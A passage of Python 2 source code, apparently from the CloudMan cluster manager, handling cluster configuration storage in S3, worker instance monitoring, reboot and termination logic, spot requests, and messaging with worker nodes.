if inst.id == inst_id:
inst.sw_state = state
def expand_user_data_volume(self):
# TODO: recover services if process fails midway
log.info("Initiating user data volume resizing")
self.app.manager._stop_app_level_services()
# Grow galaxyData filesystem
svcs = self.app.manager.get_services(svc_type=ServiceType.FILE_SYSTEM)
for svc in svcs:
if ServiceRole.GALAXY_DATA in svc.svc_roles:
log.debug("Expanding '%s'" % svc.get_full_name())
svc.expand()
self.app.manager._start_app_level_services()
return True
def create_cluster_config_file(self, file_name='persistent_data-current.yaml', addl_data=None):
"""
Capture the current cluster configuration in a file (i.e., ``persistent_data.yaml``
in cluster's bucket). The generated file is stored in CloudMan's running
directory as ``file_name``. If provided, ``addl_data`` is included in
the created configuration file.
"""
try:
cc = {} # cluster configuration
svcs = [] # list of services
fss = [] # list of filesystems
if addl_data:
cc = addl_data
cc['tags'] = self.app.cloud_interface.tags # save cloud tags, in case the cloud doesn't support them natively
for srvc in self.app.manager.services:
if srvc.svc_type == ServiceType.FILE_SYSTEM:
if srvc.persistent:
fs = {}
fs['name'] = srvc.name
fs['roles'] = ServiceRole.to_string_array(srvc.svc_roles)
fs['mount_point'] = srvc.mount_point
fs['kind'] = srvc.kind
if srvc.kind == 'bucket':
fs['ids'] = [b.bucket_name for b in srvc.buckets]
fs['access_key'] = b.a_key
fs['secret_key'] = b.s_key
elif srvc.kind == 'volume':
fs['ids'] = [v.volume_id for v in srvc.volumes]
elif srvc.kind == 'snapshot':
fs['ids'] = [
v.from_snapshot_id for v in srvc.volumes]
elif srvc.kind == 'nfs':
fs['nfs_server'] = srvc.nfs_fs.device
fs['mount_options'] = srvc.nfs_fs.mount_options
elif srvc.kind == 'gluster':
fs['gluster_server'] = srvc.gluster_fs.device
fs['mount_options'] = srvc.gluster_fs.mount_options
elif srvc.kind == 'transient':
pass
else:
log.error("For filesystem {0}, unknown kind: {0}"
.format(srvc.name, srvc.kind))
fss.append(fs)
else:
s = {}
s['name'] = srvc.name
s['roles'] = ServiceRole.to_string_array(srvc.svc_roles)
if ServiceRole.GALAXY in srvc.svc_roles:
s['home'] = self.app.path_resolver.galaxy_home
if ServiceRole.AUTOSCALE in srvc.svc_roles:
# We do not persist Autoscale service
pass
else:
svcs.append(s)
cc['filesystems'] = fss
cc['services'] = svcs
cc['cluster_type'] = self.app.manager.initial_cluster_type
cc['cluster_name'] = self.app.ud['cluster_name']
cc['placement'] = self.app.cloud_interface.get_zone()
cc['machine_image_id'] = self.app.cloud_interface.get_ami()
cc['persistent_data_version'] = self.app.PERSISTENT_DATA_VERSION
# If 'deployment_version' is not in UD, don't store it in the config
if 'deployment_version' in self.app.ud:
cc['deployment_version'] = self.app.ud['deployment_version']
misc.dump_yaml_to_file(cc, file_name)
# Reload the user data object in case anything has changed
self.app.ud = misc.merge_yaml_objects(cc, self.app.ud)
except Exception, e:
log.error("Problem creating cluster configuration file: '%s'" % e)
return file_name
@synchronized(s3_rlock)
def store_cluster_config(self):
"""
Create a cluster configuration file and store it into cluster's bucket under name
``persistent_data.yaml``. The cluster configuration is considered the set of currently
seen services in the master.
In addition, store the local Galaxy configuration files to the cluster's
bucket (do so only if they are not already there).
"""
log.debug("Storing cluster configuration to cluster's bucket")
s3_conn = self.app.cloud_interface.get_s3_connection()
if not s3_conn:
# s3_conn will be None is use_object_store is False, in this case just skip this
# function.
return
if not misc.bucket_exists(s3_conn, self.app.ud['bucket_cluster']):
misc.create_bucket(s3_conn, self.app.ud['bucket_cluster'])
# Save/update the current Galaxy cluster configuration to cluster's
# bucket
cc_file_name = self.create_cluster_config_file()
misc.save_file_to_bucket(s3_conn, self.app.ud['bucket_cluster'],
'persistent_data.yaml', cc_file_name)
# Ensure Galaxy config files are stored in the cluster's bucket,
# but only after Galaxy has been configured and is running (this ensures
# that the configuration files get loaded from proper S3 bucket rather
# than potentially being overwritten by files that might exist on the
# snap)
try:
galaxy_svc = self.app.manager.get_services(
svc_role=ServiceRole.GALAXY)[0]
if galaxy_svc.running():
for f_name in ['universe_wsgi.ini',
'tool_conf.xml',
'tool_data_table_conf.xml',
'shed_tool_conf.xml',
'datatypes_conf.xml']:
if (os.path.exists(os.path.join(self.app.path_resolver.galaxy_home, f_name))) or \
(misc.file_in_bucket_older_than_local(s3_conn, self.app.ud['bucket_cluster'], '%s.cloud' % f_name, os.path.join(self.app.path_resolver.galaxy_home, f_name))):
log.debug(
"Saving current Galaxy configuration file '%s' to cluster bucket '%s' as '%s.cloud'" % (f_name,
self.app.ud['bucket_cluster'], f_name))
misc.save_file_to_bucket(
s3_conn, self.app.ud[
'bucket_cluster'], '%s.cloud' % f_name,
os.path.join(self.app.path_resolver.galaxy_home, f_name))
except:
pass
# If not existent, save current boot script cm_boot.py to cluster's bucket
# BUG: workaround eucalyptus Walrus, which hangs on returning saved file status if misc.file_exists_in_bucket() called first
# if not misc.file_exists_in_bucket(s3_conn,
# self.app.ud['bucket_cluster'], self.app.ud['boot_script_name']) and
# os.path.exists(os.path.join(self.app.ud['boot_script_path'],
# self.app.ud['boot_script_name'])):
log.debug("Saving current instance boot script (%s) to cluster bucket '%s' as '%s'" % (os.path.join(self.app.ud['boot_script_path'], self.app.ud['boot_script_name']
), self.app.ud['bucket_cluster'], self.app.ud['boot_script_name']))
misc.save_file_to_bucket(s3_conn, self.app.ud['bucket_cluster'], self.app.ud['boot_script_name'], os.path.join(self.app.ud[
'boot_script_path'], self.app.ud['boot_script_name']))
# If not existent, save CloudMan source to cluster's bucket, including file's metadata
# BUG : workaround eucalyptus Walrus, which hangs on returning saved file status if misc.file_exists_in_bucket() called first
# if not misc.file_exists_in_bucket(s3_conn,
# self.app.ud['bucket_cluster'], 'cm.tar.gz') and
# os.path.exists(os.path.join(self.app.ud['cloudman_home'],
# 'cm.tar.gz')):
log.debug("Saving CloudMan source (%s) to cluster bucket '%s' as '%s'" % (
os.path.join(self.app.ud['cloudman_home'], 'cm.tar.gz'), self.app.ud['bucket_cluster'], 'cm.tar.gz'))
misc.save_file_to_bucket(
s3_conn, self.app.ud['bucket_cluster'], 'cm.tar.gz',
os.path.join(self.app.ud['cloudman_home'], 'cm.tar.gz'))
try:
# Currently, metadata only works on ec2 so set it only there
if self.app.cloud_type == 'ec2':
with open(os.path.join(self.app.ud['cloudman_home'], 'cm_revision.txt'), 'r') as rev_file:
rev = rev_file.read()
misc.set_file_metadata(s3_conn, self.app.ud[
'bucket_cluster'], 'cm.tar.gz', 'revision', rev)
except Exception, e:
log.debug("Error setting revision metadata on newly copied cm.tar.gz in bucket %s: %s" % (self.app.ud[
'bucket_cluster'], e))
# Create an empty file whose name is the name of this cluster (useful
# as a reference)
cn_file = os.path.join(self.app.ud['cloudman_home'],
"%s.clusterName" % self.app.ud['cluster_name'])
# BUG : workaround eucalyptus Walrus, which hangs on returning saved file status if misc.file_exists_in_bucket() called first
# if not misc.file_exists_in_bucket(s3_conn,
# self.app.ud['bucket_cluster'], "%s.clusterName" %
# self.app.ud['cluster_name']):
with open(cn_file, 'w'):
pass
if os.path.exists(cn_file):
log.debug("Saving '%s' file to cluster bucket '%s' as '%s.clusterName'" % (
cn_file, self.app.ud['bucket_cluster'], self.app.ud['cluster_name']))
misc.save_file_to_bucket(s3_conn, self.app.ud['bucket_cluster'],
"%s.clusterName" % self.app.ud['cluster_name'], cn_file)
def __add_services(self):
# Check and add any new services
added_srvcs = False # Flag to indicate if cluster conf was changed
for service in [s for s in self.app.manager.services if s.state == service_states.UNSTARTED]:
log.debug("Monitor adding service '%s'" % service.get_full_name())
self.last_system_change_time = Time.now()
if service.add():
added_srvcs = True # else:
# log.debug("Monitor DIDN'T add service {0}? Service state: {1}"\
# .format(service.get_full_name(), service.state))
# Store cluster conf after all services have been added.
# NOTE: this flag relies on the assumption service additions are
# sequential (i.e., monitor waits for the service add call to complete).
# If any of the services are to be added via separate threads, a
# system-wide flag should probably be maintained for that particular
# service that would indicate the configuration of the service is
# complete. This could probably be done by monitoring
# the service state flag that is already maintained?
if added_srvcs and self.app.cloud_type != 'opennebula':
self.store_cluster_config() # Check and grow the file system
svcs = self.app.manager.get_services(svc_type=ServiceType.FILE_SYSTEM)
for svc in svcs:
if ServiceRole.GALAXY_DATA in svc.svc_roles and svc.grow is not None:
self.last_system_change_time = Time.now()
self.expand_user_data_volume()
# Opennebula has no storage like S3, so this is not working (yet)
if self.app.cloud_type != 'opennebula':
self.store_cluster_config()
def __check_amqp_messages(self):
# Check for any new AMQP messages
m = self.conn.recv()
while m is not None:
def do_match():
match = False
for inst in self.app.manager.worker_instances:
if str(inst.id) == str(m.properties['reply_to']):
match = True
inst.handle_message(m.body)
return match
if not do_match():
log.debug("No instance (%s) match found for message %s; will add instance now!"
% (m.properties['reply_to'], m.body))
if self.app.manager.add_live_instance(m.properties['reply_to']):
do_match()
else:
log.warning("Potential error, got message from instance '%s' "
"but not aware of this instance. Ignoring the instance."
% m.properties['reply_to'])
m = self.conn.recv()
def __monitor(self):
if not self.app.manager.manager_started:
if not self.app.manager.start():
log.critical("\n\n***** Manager failed to start *****\n")
return False
log.debug("Monitor started; manager started")
while self.running:
self.sleeper.sleep(4)
if self.app.manager.cluster_status == cluster_status.TERMINATED:
self.running = False
return
# In case queue connection was not established, try again (this will happen if
# RabbitMQ does not start in time for CloudMan)
if not self.conn.is_connected():
log.debug(
"Trying to setup AMQP connection; conn = '%s'" % self.conn)
self.conn.setup()
continue
# Do a periodic system state update (eg, services, workers)
self._update_frequency()
if (Time.now() - self.last_update_time).seconds > self.update_frequency:
self.last_update_time = Time.now()
self.app.manager.check_disk()
for service in self.app.manager.services:
service.status()
# Indicate migration is in progress
migration_service = self.app.manager.get_services(svc_role=ServiceRole.MIGRATION)
if migration_service:
migration_service = migration_service[0]
msg = "Migration service in progress; please wait."
if migration_service.state == service_states.RUNNING:
if not self.app.msgs.message_exists(msg):
self.app.msgs.critical(msg)
elif migration_service.state == service_states.COMPLETED:
self.app.msgs.remove_message(msg)
# Log current services' states (in condensed format)
svcs_state = "S&S: "
for s in self.app.manager.services:
svcs_state += "%s..%s; " % (s.get_full_name(),
'OK' if s.state == 'Running' else s.state)
log.debug(svcs_state)
# Check the status of worker instances
for w_instance in self.app.manager.worker_instances:
if w_instance.is_spot():
w_instance.update_spot()
if not w_instance.spot_was_filled():
# Wait until the Spot request has been filled to start
# treating the instance as a regular Instance
continue
# Send current mount points to ensure master and workers FSs are in sync
if w_instance.node_ready:
w_instance.send_mount_points()
# As long we we're hearing from an instance, assume all OK.
if (Time.now() - w_instance.last_comm).seconds < 22:
# log.debug("Instance {0} OK (heard from it {1} secs ago)".format(
# w_instance.get_desc(),
# (Time.now() - w_instance.last_comm).seconds))
continue
# Explicitly check the state of a quiet instance (but only
# periodically)
elif (Time.now() - w_instance.last_state_update).seconds > 30:
log.debug("Have not heard from or checked on instance {0} "
"for a while; checking now.".format(w_instance.get_desc()))
w_instance.maintain()
else:
log.debug("Instance {0} has been quiet for a while (last check "
"{1} secs ago); will wait a bit longer before a check..."
.format(w_instance.get_desc(),
(Time.now() - w_instance.last_state_update).seconds))
self.__add_services()
self.__check_amqp_messages()
class Instance(object):
def __init__(self, app, inst=None, m_state=None, last_m_state_change=None,
sw_state=None, reboot_required=False, spot_request_id=None):
self.app = app
self.config = app.config
self.spot_request_id = spot_request_id
self.lifecycle = instance_lifecycle.SPOT if self.spot_request_id else instance_lifecycle.ONDEMAND
self.inst = inst # boto object of the instance
self.spot_state = None
self.private_ip = None
self.public_ip = None
self.local_hostname = None
if inst:
try:
self.id = str(inst.id)
except EC2ResponseError, e:
log.error("Error retrieving instance id: %s" % e)
else:
self.id = None
# Machine state as obtained from the cloud middleware (see
# instance_states Bunch)
self.m_state = m_state
self.last_m_state_change = Time.now()
# A time stamp when the most recent update of the instance state
# (m_state) took place
self.last_state_update = Time.now()
self.sw_state = sw_state # Software state
self.is_alive = False
self.node_ready = False
self.num_cpus = 1
self.time_rebooted = TIME_IN_PAST # Initialize to a date in the past
self.reboot_count = 0
self.terminate_attempt_count = 0
self.last_comm = TIME_IN_PAST # Initialize to a date in the past
self.nfs_data = 0
self.nfs_tools = 0
self.nfs_indices = 0
self.nfs_sge = 0
self.nfs_tfs = 0 # Transient file system, NFS-mounted from the master
self.get_cert = 0
self.sge_started = 0
self.worker_status = 'Pending' # Pending, Wake, Startup, Ready, Stopping, Error
self.load = 0
self.type = 'Unknown'
self.reboot_required = reboot_required
self.update_spot()
def maintain(self):
""" Based on the state and status of this instance, try to do the right thing
to keep the instance functional. Note that this may lead to terminating
the instance.
"""
def reboot_terminate_logic():
""" Make a decision whether to terminate or reboot an instance.
CALL THIS METHOD CAREFULLY because it defaults to terminating the
instance!
"""
if self.reboot_count < self.config.instance_reboot_attempts:
self.reboot()
elif self.terminate_attempt_count >= self.config.instance_terminate_attempts:
log.info("Tried terminating instance {0} {1} times but was unsuccessful. Giving up."
.format(self.inst.id, self.config.instance_terminate_attempts))
self._remove_instance()
else:
log.info("Instance {0} not responding after {1} reboots. Terminating instance."
.format(self.id, self.reboot_count))
self.terminate()
# Update state then do resolution
state = self.get_m_state()
if state == instance_states.PENDING or state == instance_states.SHUTTING_DOWN:
if (Time.now() - self.last_m_state_change).seconds > self.config.instance_state_change_wait and \
(Time.now() - self.time_rebooted).seconds > self.config.instance_reboot_timeout:
log.debug("'Maintaining' instance {0} stuck in '{1}' state.".format(
self.get_desc(), state))
reboot_terminate_logic()
elif state == instance_states.ERROR:
log.debug(
"'Maintaining' instance {0} in '{1}' state.".format(self.get_desc(),
instance_states.ERROR))
reboot_terminate_logic()
elif state == instance_states.TERMINATED:
log.debug(
"'Maintaining' instance {0} in '{1}' state.".format(self.get_desc(),
instance_states.TERMINATED))
self._remove_instance()
elif state == instance_states.RUNNING:
log.debug("'Maintaining' instance {0} in '{1}' state (last comm before {2} | "
"last m_state change before {3} | time_rebooted before {4}".format(
self.get_desc(), instance_states.RUNNING,
dt.timedelta(seconds=(Time.now() - self.last_comm).seconds),
dt.timedelta(seconds=(Time.now() - self.last_m_state_change).seconds),
dt.timedelta(seconds=(Time.now() - self.time_rebooted).seconds)))
if (Time.now() - self.last_comm).seconds > self.config.instance_comm_timeout and \
(Time.now() - self.last_m_state_change).seconds > self.config.instance_state_change_wait and \
(Time.now() - self.time_rebooted).seconds > self.config.instance_reboot_timeout:
reboot_terminate_logic()
def get_cloud_instance_object(self, deep=False):
""" Get the instance object for this instance from the library used to
communicate with the cloud middleware. In the case of boto, this
is the boto EC2 Instance object.
:type deep: bool
:param deep: If True, force the check with the cloud middleware; else
use local field by default
:rtype: boto.ec2.instance.Instance (should really be a more generic repr
but we'll wait for OCCI or something)
:return: cloud instance object for this instance
"""
if self.app.TESTFLAG is True:
log.debug(
"Attempted to get instance cloud object, but TESTFLAG is set. Returning None")
return None
if deep is True: # reset the current local instance field
self.inst = None
if self.inst is None and self.id is not None:
try:
rs = self.app.cloud_interface.get_all_instances(self.id)
if len(rs) == 0:
log.warning("Instance {0} not found on the cloud?".format(
self.id))
for r in rs:
# Update local fields
self.inst = r.instances[0]
self.id = r.instances[0].id
self.m_state = r.instances[0].state
except EC2ResponseError, e:
log.error("Trouble getting the cloud instance ({0}) object: {1}"
.format(self.id, e))
except Exception, e:
log.error("Error getting the cloud instance ({0}) object: {1}"
.format(self.id, e))
elif not self.is_spot():
log.debug(
"Cannot get cloud instance object without an instance ID?")
return self.inst
def is_spot(self):
""" Test is this Instance is a Spot instance.
:rtype: bool
:return: True if the current Instance is Spot instance, False otherwise.
"""
return self.lifecycle == instance_lifecycle.SPOT
def spot_was_filled(self):
""" For Spot-based instances, test if the spot request has been
filled (ie, an instance was started)
:rtype: bool
:return: True if this is a Spot instance and the Spot request
is in state spot_states.ACTIVE. False otherwise.
"""
self.update_spot()
if self.is_spot() and self.spot_state == spot_states.ACTIVE:
return True
return False
def get_status_dict(self):
toret = {'id': self.id,
'ld': self.load,
'time_in_state': misc.formatSeconds(Time.now() - self.last_m_state_change),
'nfs_data': self.nfs_data,
'nfs_tools': self.nfs_tools,
'nfs_indices': self.nfs_indices,
'nfs_sge': self.nfs_sge,
'nfs_tfs': self.nfs_tfs,
'get_cert': self.get_cert,
'sge_started': self.sge_started,
'worker_status': self.worker_status,
'instance_state': self.m_state,
'instance_type': self.type,
'public_ip': self.public_ip}
if self.load != 0:
lds = self.load.split(' ')
if len(lds) == 3:
toret['ld'] = "%s %s %s" % (float(lds[0]) / self.num_cpus, float(
lds[1]) / self.num_cpus, float(lds[2]) / self.num_cpus)
return toret
def get_status_array(self):
if self.m_state.lower() == "running": # For extra states.
if self.is_alive is not True:
ld = "Starting"
elif self.load != 0:
lds = self.load.split(' ')
if len(lds) == 3:
try:
load1 = float(lds[0]) / self.num_cpus
load2 = float(lds[1]) / self.num_cpus
load3 = float(lds[2]) / self.num_cpus
ld = "%s %s %s" % (load1, load2, load3)
except Exception, e:
log.debug("Problems normalizing load: %s" % e)
ld = self.load
else:
ld = self.load
elif self.node_ready:
ld = "Running"
return [self.id, ld, misc.formatSeconds(
Time.now() - self.last_m_state_change),
self.nfs_data, self.nfs_tools, self.nfs_indices, self.nfs_sge, self.get_cert,
self.sge_started, self.worker_status]
else:
return [self.id, self.m_state, misc.formatSeconds(Time.now() - self.last_m_state_change),
self.nfs_data, self.nfs_tools, self.nfs_indices, self.nfs_sge, self.get_cert,
self.sge_started, self.worker_status]
def get_id(self):
if self.app.TESTFLAG is True:
log.debug(
"Attempted to get instance id, but TESTFLAG is set. Returning TestInstanceID")
return "TestInstanceID"
if self.inst is not None and self.id is None:
try:
self.inst.update()
self.id = self.inst.id
except EC2ResponseError, e:
log.error("Error retrieving instance id: %s" % e)
except Exception, e:
log.error("Exception retreiving instance object: %s" % e)
return self.id
def get_desc(self):
""" Get basic but descriptive info about this instance. Useful for logging.
"""
if self.is_spot() and not self.spot_was_filled():
return "'{sid}'".format(sid=self.spot_request_id)
return "'{id}' (IP: {ip})".format(id=self.get_id(), ip=self.get_public_ip())
def reboot(self, count_reboot=True):
"""
Reboot this instance. If ``count_reboot`` is set, increment the number
of reboots for this instance (a treshold in this count leads to eventual
instance termination, see ``self.config.instance_reboot_attempts``).
"""
if self.inst is not None:
# Show reboot count only if this reboot counts toward the reboot quota
s = " (reboot #{0})".format(self.reboot_count + 1)
log.info("Rebooting instance {0}{1}.".format(self.get_desc(),
s if count_reboot else ''))
try:
self.inst.reboot()
self.time_rebooted = Time.now()
except EC2ResponseError, e:
log.error("Trouble rebooting instance {0}: {1}".format(self.get_desc(), e))
else:
log.debug("Attampted to reboot instance {0} but no instance object? "
"(doing nothing)".format(self.get_desc()))
if count_reboot:
# Increment irespective of success to allow for eventual termination
self.reboot_count += 1
log.debug("Incremented instance reboot count to {0} (out of {1})"
.format(self.reboot_count, self.config.instance_reboot_attempts))
def terminate(self):
self.worker_status = "Stopping"
t_thread = threading.Thread(target=self.__terminate)
t_thread.start()
return t_thread
def __terminate(self):
inst_terminated = self.app.cloud_interface.terminate_instance(
instance_id=self.id,
spot_request_id=self.spot_request_id if self.is_spot() else None)
self.terminate_attempt_count += 1
if inst_terminated is False:
log.error("Terminating instance %s did not go smoothly; instance state: '%s'"
% (self.get_desc(), self.get_m_state()))
else:
# Remove the reference to the instance object because with OpenStack &
# boto the instance.update() method returns the instance as being
# in 'running' state even though the instance does not even exist
# any more.
self.inst = None
self._remove_instance()
def _remove_instance(self, force=False):
""" A convenience method to remove the current instance from the list
of worker instances tracked by the master object.
:type force: bool
:param force: Indicate if the instance should be forcefully (ie, irrespective)
of other logic) removed from the list of instances maintained
by the master object.
"""
try:
if self in self.app.manager.worker_instances:
self.app.manager.worker_instances.remove(self)
log.info(
"Instance '%s' removed from the internal instance list." % self.id)
# If this was the last worker removed, add master back as execution host.
if len(self.app.manager.worker_instances) == 0 and not self.app.manager.master_exec_host:
self.app.manager.toggle_master_as_exec_host()
except ValueError, e:
log.warning("Instance '%s' no longer in instance list, the global monitor probably "
"picked it up and deleted it already: %s" % (self.id, e))
def instance_can_be_terminated(self):
log.debug("Checking if instance '%s' can be terminated" % self.id)
# TODO (qstat -qs {a|c|d|o|s|u|A|C|D|E|S})
return False
def get_m_state(self):
""" Update the machine state of the current instance by querying the
cloud middleware for the instance object itself (via the instance
id) and updating self.m_state field to match the state returned by
the cloud middleware.
Also, update local last_state_update timestamp.
:rtype: String
:return: the current state of the instance as obtained from the
cloud middleware
"""
if self.app.TESTFLAG is True:
log.debug("Getting m_state for instance {0} but TESTFLAG is set; returning 'running'"
.format(self.get_id()))
return "running"
self.last_state_update = Time.now()
self.get_cloud_instance_object(deep=True)
if self.inst:
try:
state = self.inst.state
log.debug("Requested instance {0} update: old state: {1}; new state: {2}"
.format(self.get_desc(), self.m_state, state))
if state != self.m_state:
self.m_state = state
self.last_m_state_change = Time.now()
except EC2ResponseError, e:
log.debug("Error updating instance {0} state: {1}".format(
self.get_id(), e))
self.m_state = instance_states.ERROR
else:
if not self.is_spot() or self.spot_was_filled():
log.debug("Instance object {0} not found during m_state update; "
"setting instance state to {1}".format(self.get_id(), instance_states.TERMINATED))
self.m_state = instance_states.TERMINATED
return self.m_state
@TestFlag(None)
def send_alive_request(self):
self.app.manager.console_monitor.conn.send('ALIVE_REQUEST', self.id)
def send_sync_etc_host(self, msg):
# Because the hosts file is synced over the transientFS, give the FS
# some time to become available before sending the msg
for i in range(5):
if int(self.nfs_tfs):
self.app.manager.console_monitor.conn.send('SYNC_ETC_HOSTS | ' + msg, self.id)
break
log.debug("Transient FS on instance not available; waiting a bit...")
time.sleep(7)
def send_status_check(self):
# log.debug("\tMT: Sending STATUS_CHECK message" )
if self.app.TESTFLAG is True:
return
self.app.manager.console_monitor.conn.send('STATUS_CHECK', self.id)
# log.debug( "\tMT: Message STATUS_CHECK sent; waiting on response" )
def send_worker_restart(self):
# log.info("\tMT: Sending restart message to worker %s" % self.id)
if self.app.TESTFLAG is True:
return
self.app.manager.console_monitor.conn.send('RESTART | %s' % self.app.cloud_interface.get_private_ip(), self.id)
log.info("\tMT: Sent RESTART message to worker '%s'" % self.id)
def update_spot(self, force=False):
""" Get an update on the state of a Spot request. If the request has entered
spot_states.ACTIVE or spot_states.CANCELLED states, update the Instance
object itself otherwise just update state. The method will continue to poll
for an update until the spot request has been filled (ie, enters state
spot_states.ACTIVE). After that, simply return the spot state (see
force parameter).
:type force: bool
:param force: If True, poll for an update on the spot request,
irrespective of the stored spot request state.
"""
if self.is_spot() and (force or self.spot_state != spot_states.ACTIVE):
old_state = self.spot_state
try:
ec2_conn = self.app.cloud_interface.get_ec2_connection()
reqs = ec2_conn.get_all_spot_instance_requests(
request_ids=[self.spot_request_id])
for req in reqs:
self.spot_state = req.state
# Also update the worker_status because otherwise there's no
# single source to distinguish between simply an instance
# in Pending state and a Spot request
self.worker_status = self.spot_state
# If the state has changed, do a deeper update
if self.spot_state != old_state:
if self.spot_state == spot_states.CANCELLED:
# The request was canceled so remove this Instance
# object
log.info("Spot request {0} was canceled; removing Instance object {1}"
.format(self.spot_request_id, self.id))
self._remove_instance()
elif self.spot_state == spot_states.ACTIVE:
# We should have an instance now
self.id = req.instance_id
log.info("Spot request {0} filled with instance {1}"
.format(self.spot_request_id, self.id))
# Potentially give it a few seconds so everything gets registered
for i in range(3):
instance = self.get_cloud_instance_object()
if instance:
self.app.cloud_interface.add_tag(instance,
'clusterName', self.app.ud['cluster_name'])
self.app.cloud_interface.add_tag(instance, 'role', 'worker')
self.app.cloud_interface.add_tag(instance,
'Name', "Worker: {0}".format(self.app.ud['cluster_name']))
break
time.sleep(5)
except EC2ResponseError, e:
log.error("Trouble retrieving spot request {0}: {1}".format(
self.spot_request_id, e))
return self.spot_state
def get_private_ip(self):
# log.debug("Getting instance '%s' private IP: '%s'" % ( self.id, self.private_ip ) )
if self.app.TESTFLAG is True:
log.debug(
"Attempted to get instance private IP, but TESTFLAG is set. Returning 127.0.0.1")
self.private_ip = '127.0.0.1'
if self.private_ip is None:
inst = self.get_cloud_instance_object()
if inst is not None:
try:
inst.update()
self.private_ip = inst.private_ip_address
except EC2ResponseError:
log.debug("private_ip_address for instance {0} not (yet?) available."
.format(self.get_id()))
else:
log.debug("private_ip_address for instance {0} with no instance object not available."
.format(self.get_id()))
return self.private_ip
@TestFlag('127.0.0.1')
def get_public_ip(self):
"""
Get the public IP address of this worker instance.
"""
if not self.public_ip:
inst = self.get_cloud_instance_object(deep=True)
# log.debug('Getting public IP for instance {0}'.format(inst.id))
if inst:
try:
inst.update()
self.public_ip = inst.ip_address
if self.public_ip:
log.debug("Got public IP for instance {0}: {1}".format(
self.get_id(), self.public_ip))
else:
log.debug("Still no public IP for instance {0}".format(
self.get_id()))
except EC2ResponseError:
log.debug("ip_address for instance {0} not (yet?) available.".format(
self.get_id()))
else:
log.debug("ip_address for instance {0} with no instance object not available."
.format(self.get_id()))
return self.public_ip
def get_local_hostname(self):
return self.local_hostname
def send_mount_points(self):
mount_points = []
for fs in self.app.manager.get_services(svc_type=ServiceType.FILE_SYSTEM):
if fs.nfs_fs:
fs_type = "nfs"
server = fs.nfs_fs.device
options = fs.nfs_fs.mount_options
elif fs.gluster_fs:
fs_type = "glusterfs"
server = fs.gluster_fs.device
options = fs.gluster_fs.mount_options
else:
fs_type = "nfs"
server = self.app.cloud_interface.get_private_ip()
options = None
mount_points.append(
{'fs_type': fs_type,
'server': server,
'mount_options': options,
'shared_mount_path': fs.get_details()['mount_point'],
'fs_name': fs.get_details()['name']})
jmp = json.dumps({'mount_points': mount_points})
self.app.manager.console_monitor.conn.send('MOUNT | %s' % jmp, self.id)
# log.debug("Sent mount points %s to worker %s" % (mount_points, self.id))
def send_master_pubkey(self):
# log.info("\tMT: Sending MASTER_PUBKEY message: %s" % self.app.manager.get_root_public_key() )
self.app.manager.console_monitor.conn.send('MASTER_PUBKEY | %s'
% self.app.manager.get_root_public_key(), self.id)
log.debug("Sent master public key to worker instance '%s'." % self.id)
log.debug("\tMT: Message MASTER_PUBKEY %s sent to '%s'"
% (self.app.manager.get_root_public_key(), self.id))
def send_start_sge(self):
log.debug("\tMT: Sending START_SGE message to instance '%s'" % self.id)
self.app.manager.console_monitor.conn.send('START_SGE', self.id)
def send_add_s3fs(self, bucket_name, svc_roles):
msg = 'ADDS3FS | {0} | {1}'.format(bucket_name, ServiceRole.to_string(svc_roles))
self._send_msg(msg)
# def send_add_nfs_fs(self, nfs_server, fs_name, svc_roles, username=None, pwd=None):
# """
# Send a message to the worker node requesting it to mount a new file system
# form the ``nfs_server`` at mount point /mnt/``fs_name`` with roles``svc_roles``.
# """
# nfs_server_info = {
# 'nfs_server': nfs_server, 'fs_name': fs_name, 'username': username,
# 'pwd': pwd, 'svc_roles': ServiceRole.to_string(svc_roles)
# }
# msg = "ADD_NFS_FS | {0}".format(json.dumps({'nfs_server_info': nfs_server_info}))
# self._send_msg(msg)
def _send_msg(self, msg):
"""
An internal convenience method to log and send a message to the current instance.
"""
log.debug("\tMT: Sending message '{msg}' to instance {inst}".format(msg=msg, inst=self.id))
self.app.manager.console_monitor.conn.send(msg, self.id)
def handle_message(self, msg):
# log.debug( "Handling message: %s from %s" % ( msg, self.id ) )
self.is_alive = True
self.last_comm = Time.now()
# Transition from states to a particular response.
if self.app.manager.console_monitor.conn:
msg_type = msg.split(' | ')[0]
if msg_type == "ALIVE":
self.worker_status = "Starting"
log.info("Instance %s reported alive" % self.get_desc())
msp = msg.split(' | ')
self.private_ip = msp[1]
self.public_ip = msp[2]
self.zone = msp[3]
self.type = msp[4]
self.ami = msp[5]
try:
self.local_hostname = msp[6]
except:
# Older versions of CloudMan did not pass this value so if the master
# and the worker are running 2 diff versions (can happen after an
# automatic update), don't crash here.
self.local_hostname = self.public_ip
log.debug("INSTANCE_ALIVE private_dns:%s public_dns:%s pone:%s type:%s ami:%s hostname: %s"
% (self.private_ip,
self.public_ip,
self.zone,
self.type,
self.ami,
self.local_hostname))
# Instance is alive and functional. Send master pubkey.
self.send_mount_points()
elif msg_type == "GET_MOUNTPOINTS":
self.send_mount_points()
elif msg_type == "MOUNT_DONE":
self.send_master_pubkey()
# Add hostname to /etc/hosts (for SGE config)
if self.app.cloud_type in ('openstack', 'eucalyptus'):
hn2 = ''
if '.' in self.local_hostname:
hn2 = (self.local_hostname).split('.')[0]
worker_host_line = '{ip} {hn1} {hn2}\n'.format(ip=self.private_ip,
hn1=self.local_hostname, hn2=hn2)
log.debug("worker_host_line: {0}".format(worker_host_line))
with open('/etc/hosts', 'r+') as f:
hosts = f.readlines()
if worker_host_line not in hosts:
log.debug("Adding worker {0} to /etc/hosts".format(
self.local_hostname))
f.write(worker_host_line)
if self.app.cloud_type == 'opennebula':
f = open("/etc/hosts", 'a')
f.write("%s\tworker-%s\n" % (self.private_ip, self.id))
f.close()
elif msg_type == "WORKER_H_CERT":
self.is_alive = True # This is for the case that an existing worker is added to a new master.
self.app.manager.save_host_cert(msg.split(" | ")[1])
log.debug("Worker '%s' host certificate received and appended to /root/.ssh/known_hosts"
% self.id)
try:
sge_svc = self.app.manager.get_services(
svc_role=ServiceRole.SGE)[0]
if sge_svc.add_sge_host(self.get_id(), self.local_hostname):
# Send a message to worker to start SGE
self.send_start_sge()
# If there are any bucket-based FSs, tell the worker to
# add those
fss = self.app.manager.get_services(
svc_type=ServiceType.FILE_SYSTEM)
for fs in fss:
if len(fs.buckets) > 0:
for b in fs.buckets:
self.send_add_s3fs(b.bucket_name, fs.svc_roles)
log.info("Waiting on worker instance %s to configure itself..."
% self.get_desc())
else:
log.error("Adding host to SGE did not go smoothly, "
"not instructing worker to configure SGE daemon.")
except IndexError:
log.error(
"Could not get a handle on SGE service to add a host; host not added")
elif msg_type == "NODE_READY":
self.node_ready = True
